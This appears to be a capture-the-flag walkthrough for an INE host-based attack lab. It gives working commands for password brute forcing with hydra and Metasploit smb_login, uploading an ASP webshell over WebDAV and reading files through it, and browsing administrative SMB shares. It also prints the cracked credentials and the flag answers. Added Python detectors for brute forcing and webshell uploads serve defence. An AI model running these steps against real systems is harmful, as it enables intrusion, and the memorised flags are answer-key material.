CTF 1 INE - Host & Network Penetration Testing: System-Host Based Attacks

Objective: Perform system/host-based attacks on the target and capture all the flags hidden within the environment.

Useful files:

  • /usr/share/metasploit-framework/data/wordlists/common_users.txt

  • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

  • /usr/share/webshells/asp/webshell.asp

Flags to Capture:

  • Flag 1: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local)

  • Flag 2: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)

  • Flag 3: By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag. (target2.ine.local)

  • Flag 4: The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)

Tools

  • Nmap

  • Hydra

  • Cadaver

  • Metasploit Framework

Flag 1: User 'bob' might not have chosen a strong password. Try common passwords. (target1.ine.local)

Solution: Target = target1.ine.local

Resolve the DNS name to an IP > resolveip target1.ine.local > 10.3.18.27 (subject to change)

Perform an Nmap scan > nmap -sV -sC 10.3.18.27

Result >

80/tcp open http Microsoft IIS httpd 10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D

Open a web browser and navigate to the IP address > http://10.3.18.27

Notice that the site prompts for a username and password that we do not have.

Brute-force the login at http://10.3.19.10/ > hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 10.3.18.27 http-get /

Result > [80][http-get] host: 10.3.18.27 login: bob password: password_123321

Log in to the site with the credentials found.

Perform directory enumeration using dirb > dirb http://target1.ine.local -u bob:password_123321

Result ==> DIRECTORY: http://target1.ine.local/webdav/

To find flag 1: navigate to http://10.3.18.27/webdav

Then click on the flag1.txt file (listed with size 34) to reveal the flag > 4ccc8664b99f44158dd3e42c46ae39eb

Flag 2: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)

Run > davtest -url http://10.3.18.27/webdav

Result: OPEN FAIL: http://10.3.18.27/webdav Unauthorized. Basic realm="10.3.18.27" > Authentication credentials are required.

Rerun with the credentials > davtest -auth bob:password_123321 -url http://10.3.18.27/webdav

Result: Checking for test file execution

The davtest output (screenshot not reproduced here) reports SUCCEED for uploading and executing its test files in the /webdav directory, so we can use cadaver to upload a file of our own.

Run > cadaver http://10.3.18.27/webdav > enter username: bob and password: password_123321

Open a new terminal and locate the ASP webshell that will be uploaded to /webdav with cadaver

Run > ls -al /usr/share/webshells/asp

Return to the cadaver terminal and upload webshell.asp to /webdav > run put /usr/share/webshells/asp/webshell.asp

Navigate back to http://10.3.18.27/webdav > confirm that webshell.asp has been uploaded successfully.

Open webshell.asp in the browser; the page presents a text box for running commands.

Run some basic commands in the text box: whoami, ipconfig.

To obtain the flag > run dir C:\ to list the files > Directory of C:\ > 34 flag2.txt

run type C:\flag.txt > 10.3.18.27f92fd94258a149a296300195335f3e54
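As an added defensive counterpart to the two steps above (this is not part of the INE lab write-up): the hydra run against the Basic-auth-protected site and the cadaver PUT of webshell.asp both leave a characteristic trace in IIS's W3C logs. The Python below parses such a log and flags (a) a burst of 401 responses for one client/user pair that is followed by a 200, and (b) a successful PUT of a server-side script under /webdav. The log lines are constructed samples; the attacker address 10.10.45.2, the timestamps and the thresholds are assumptions.

```python
"""Detect HTTP Basic-auth password guessing and WebDAV script uploads in IIS logs.

Added example, not part of the INE lab write-up. The log excerpt below is
constructed to resemble what target1.ine.local's IIS would record during the
steps above (hydra against the 401-protected site, then a cadaver PUT of
webshell.asp into /webdav). Field names follow the IIS W3C extended format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample IIS W3C log (IIS writes spaces in the user-agent as '+').
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2025-01-17 18:20:01 10.3.18.27 GET / - 80 - 10.10.45.2 Mozilla/4.0+(Hydra) 401 2 5
2025-01-17 18:20:01 10.3.18.27 GET / - 80 bob 10.10.45.2 Mozilla/4.0+(Hydra) 401 1 1326
2025-01-17 18:20:01 10.3.18.27 GET / - 80 bob 10.10.45.2 Mozilla/4.0+(Hydra) 401 1 1326
2025-01-17 18:20:02 10.3.18.27 GET / - 80 bob 10.10.45.2 Mozilla/4.0+(Hydra) 401 1 1326
2025-01-17 18:20:02 10.3.18.27 GET / - 80 bob 10.10.45.2 Mozilla/4.0+(Hydra) 401 1 1326
2025-01-17 18:20:02 10.3.18.27 GET / - 80 bob 10.10.45.2 Mozilla/4.0+(Hydra) 401 1 1326
2025-01-17 18:20:03 10.3.18.27 GET / - 80 bob 10.10.45.2 Mozilla/4.0+(Hydra) 401 1 1326
2025-01-17 18:20:03 10.3.18.27 GET / - 80 bob 10.10.45.2 Mozilla/4.0+(Hydra) 200 0 0
2025-01-17 18:31:12 10.3.18.27 GET /webdav/ - 80 bob 10.10.45.2 Mozilla/5.0 200 0 0
2025-01-17 18:33:40 10.3.18.27 PUT /webdav/webshell.asp - 80 bob 10.10.45.2 cadaver/0.23.3 201 0 0
2025-01-17 18:33:55 10.3.18.27 PUT /webdav/notes.txt - 80 bob 10.10.45.2 cadaver/0.23.3 201 0 0
2025-01-17 18:34:10 10.3.18.27 GET /webdav/webshell.asp - 80 bob 10.10.45.2 Mozilla/5.0 200 0 0
"""

# Extensions IIS will hand to a script engine; the set is an assumption, extend it to taste.
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".config")


def parse_iis_log(text):
    """Parse IIS W3C extended log text into dicts keyed by the '#Fields:' names.
    Each record also gets a 'ts' datetime built from the date and time fields."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # other directives (#Software, #Date, ...) carry no request
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # cannot map this line onto the declared fields; skip it
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def find_auth_bruteforce(records, threshold=5, window=timedelta(seconds=60)):
    """Flag (client, user) pairs with at least `threshold` 401s inside `window`,
    and report whether the same pair later got a 2xx (guessing that succeeded)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for rec in records:
        if rec["cs-username"] == "-":
            continue  # the initial unauthenticated challenge carries no credential guess
        key = (rec["c-ip"], rec["cs-username"])
        if rec["sc-status"] == "401":
            failures[key].append(rec["ts"])
        elif rec["sc-status"].startswith("2"):
            successes[key].append(rec["ts"])
    alerts = []
    for key, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):              # sliding window over failure times
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_fail = times[-1]
            alerts.append({
                "client": key[0], "user": key[1], "failures": len(times),
                "max_in_window": peak, "first": times[0], "last": last_fail,
                "succeeded_after": any(t >= last_fail for t in successes.get(key, [])),
            })
    return alerts


def find_webdav_script_uploads(records, root="/webdav/", exts=SCRIPT_EXTS):
    """Return successful PUT requests that placed a server-side script under `root`.
    (MOVE/COPY destinations live in the Destination header, which the default
    log fields do not record, so only PUT is checked here.)"""
    hits = []
    for rec in records:
        stem = rec["cs-uri-stem"].lower()
        if (rec["cs-method"] == "PUT" and stem.startswith(root)
                and stem.endswith(exts) and rec["sc-status"].startswith("2")):
            hits.append({"ts": rec["ts"], "client": rec["c-ip"], "user": rec["cs-username"],
                         "method": rec["cs-method"], "path": rec["cs-uri-stem"]})
    return hits


if __name__ == "__main__":
    recs = parse_iis_log(SAMPLE_LOG)
    for a in find_auth_bruteforce(recs):
        print(f"password guessing: {a['client']} -> {a['user']}: {a['failures']} failures, "
              f"{a['max_in_window']} within 60s, success afterwards: {a['succeeded_after']}")
    for h in find_webdav_script_uploads(recs):
        print(f"script upload: {h['ts']} {h['client']} ({h['user']}) {h['method']} {h['path']}")
```

The two checks correspond to the two weaknesses this target demonstrates: no lockout or rate limit in front of Basic authentication, and a WebDAV directory that accepts and executes script files. The same logic translates directly into a SIEM query over the IIS log fields; on the server side, request filtering on script extensions and disabling WebDAV authoring where it is not needed close the upload path.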

Flag 3: SMB shares might contain hidden files. Check the available shares. (target2.ine.local)

Target > target2.ine.local > 10.3.21.145

nmap scan: nmap -sC -sV -O 10.3.21.145 > 445/tcp open microsoft-ds Windows Server 2019 Datacenter 17763 microsoft-ds

run service postgresql start && msfconsole

search type:auxiliary name:smb

use 37 auxiliary/scanner/smb/smb_enumusers

set RHOSTS 10.3.21.145 then run

result > Error: Msf::Exploit::Remote::SMB::Client::Ipc::SmbIpcAuthenticationError Unable to authenticate

We can brute-force the authentication process using the Metasploit module smb_login

search smb_login

use auxiliary/scanner/smb/smb_login (search result 24, "SMB Login Check Scanner")

Run options, then > set RHOSTS 10.3.21.145

set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

set VERBOSE false

then run

Results > Bruteforce completed, 4 credentials were successful.

10.3.21.145:445 - Success: '.\rooty:spongebob'

10.3.21.145:445 - Success: '.\demo:password1'

10.3.21.145:445 - Success: '.\auditor:hellokitty'

10.3.21.145:445 - Success: '.\administrator:pineapple' Administrator
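The smb_login run above is what the target's Security event log sees as a burst of network logon failures (event 4625, logon type 3) from one source across many account names, followed by a few successful logons (event 4624) for the accounts that were guessed. The Python below is an added detection example, not part of the INE lab write-up: it builds a constructed set of such events (the source address 10.10.45.2, the account names, the timings and the thresholds are all assumptions) and flags a source whose failure rate and account spread look like a dictionary attack, listing which guessed accounts then logged in.

```python
"""Detect SMB password guessing from Windows Security events 4625/4624.

Added example, not part of the INE lab write-up. Events are represented as
dicts with the fields a log forwarder would extract from the Security log;
the sample set is constructed, not captured from target2.ine.local.
"""
from collections import defaultdict
from datetime import datetime, timedelta

NETWORK_LOGON = 3  # Logon Type 3 is what SMB (and other network) logons produce


def make_sample_events():
    """Constructed sample: a user-list x password-list run from 10.10.45.2 against
    eight accounts, four of which then log on, plus one benign typo from an admin host."""
    base = datetime(2025, 1, 17, 18, 40, 0)
    events, t = [], base
    for user in ["admin", "root", "rooty", "demo", "auditor", "administrator", "guest", "service"]:
        for _ in range(5):  # five wrong passwords per account
            events.append({"EventID": 4625, "TimeCreated": t, "TargetUserName": user,
                           "IpAddress": "10.10.45.2", "LogonType": NETWORK_LOGON,
                           "Status": "0xC000006D"})  # STATUS_LOGON_FAILURE
            t += timedelta(milliseconds=250)
    for user in ["rooty", "demo", "auditor", "administrator"]:
        events.append({"EventID": 4624, "TimeCreated": t, "TargetUserName": user,
                       "IpAddress": "10.10.45.2", "LogonType": NETWORK_LOGON, "Status": "0x0"})
        t += timedelta(milliseconds=250)
    # Benign noise: one mistyped password from an admin workstation, then a normal logon.
    events.append({"EventID": 4625, "TimeCreated": base + timedelta(minutes=3),
                   "TargetUserName": "Administrator", "IpAddress": "10.3.21.50",
                   "LogonType": NETWORK_LOGON, "Status": "0xC000006A"})  # wrong password
    events.append({"EventID": 4624, "TimeCreated": base + timedelta(minutes=3, seconds=20),
                   "TargetUserName": "Administrator", "IpAddress": "10.3.21.50",
                   "LogonType": NETWORK_LOGON, "Status": "0x0"})
    return events


def find_smb_password_guessing(events, window=timedelta(minutes=5),
                               min_failures=20, min_accounts=3):
    """Group network-logon 4625 events by source IP. Flag a source whose densest
    `window` holds at least `min_failures` failures spread over at least
    `min_accounts` distinct accounts, and list which of those accounts later
    produced a 4624 from the same source."""
    failures = defaultdict(list)  # ip -> [(timestamp, account)]
    successes = defaultdict(set)  # ip -> {(timestamp, account)}
    for ev in events:
        if ev.get("LogonType") != NETWORK_LOGON:
            continue
        key = (ev["TimeCreated"], ev["TargetUserName"].lower())
        if ev["EventID"] == 4625:
            failures[ev["IpAddress"]].append(key)
        elif ev["EventID"] == 4624:
            successes[ev["IpAddress"]].add(key)
    alerts = []
    for ip, fails in failures.items():
        fails.sort()
        start, peak = 0, 0
        for end in range(len(fails)):              # sliding window over failure times
            while fails[end][0] - fails[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        accounts = {user for _, user in fails}
        if peak >= min_failures and len(accounts) >= min_accounts:
            first_fail = fails[0][0]
            compromised = sorted({user for ts, user in successes.get(ip, ())
                                  if ts >= first_fail and user in accounts})
            alerts.append({"source": ip, "peak_failures_in_window": peak,
                           "distinct_accounts": len(accounts),
                           "first_failure": first_fail, "last_failure": fails[-1][0],
                           "guessed_then_logged_in": compromised})
    return alerts


if __name__ == "__main__":
    for a in find_smb_password_guessing(make_sample_events()):
        print(f"{a['source']}: {a['peak_failures_in_window']} failures in 5 min over "
              f"{a['distinct_accounts']} accounts; guessed accounts that then logged in: "
              f"{', '.join(a['guessed_then_logged_in']) or 'none'}")
```

The benign typo from 10.3.21.50 stays below both thresholds, which is the point of requiring account spread as well as volume: a single user mistyping a password repeatedly is a helpdesk ticket, a single source failing against many accounts is a credential attack. On the server side an account lockout policy and removal of the weak passwords found above (all four are in a stock wordlist) are the direct fixes.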

We can proceed to log in to SMB using one of the credentials found.

To do this we can use a utility called smbclient.

Syntax > smbclient -L //<server> -U <username>

-L: Tells smbclient to list the shares.

//<server>: The IP address or hostname of the SMB server.

-U : The username to authenticate with (optional).

-p for specifying a password

Open a new terminal

run smbclient -L //10.3.21.145/ -U administrator%pineapple

Result:

Sharename  Type  Comment
---------  ----  -------
ADMIN$     Disk  Remote Admin
C$         Disk  Default share
IPC$       IPC   Remote IPC
Shared     Disk
Shared2    Disk
Shared3    Disk

The administrator account can see 6 shares.

We can Access a share using the following Syntax

smbclient //server/share -U username%password

//server/share: The server IP/hostname and the name of the share you want to access.

-U username%password: The username and password to authenticate with.

smbclient //10.3.21.145/ADMIN$ -U administrator%pineapple

run ls > no flag in this share

check C$ share

run smbclient //10.3.21.145/C$ -U administrator%pineapple

run ls to list files

Result > flag3.txt A 34 Fri Jan 17 18:12:36 2025

To view the flag3.txt

run get flag3.txt > getting file \flag3.txt of size 34 as flag3.txt (2.8 KiloBytes/sec)

Open a new terminal

run ls then cat flag3.txt > f4eb9f7602c1489fb9dac39fcae39c38

Flag 4 : The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)

While still in the C$ share in the smbclient terminal, change into the Administrator's Desktop directory:

smb: \> cd Users\
smb: \Users\> ls
smb: \Users\> cd Administrator\
smb: \Users\Administrator\> ls
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> ls

Result> flag4.txt A 34 Fri Jan 17 18:12:36 2025

Again, retrieve the file to read it > run get flag4.txt > getting file \Users\Administrator\Desktop\flag4.txt of size 34 as flag4.txt

Open a new terminal > ls

run cat flag4.txt > 15c81e33cb9a40e5931a57bfd4f6b869
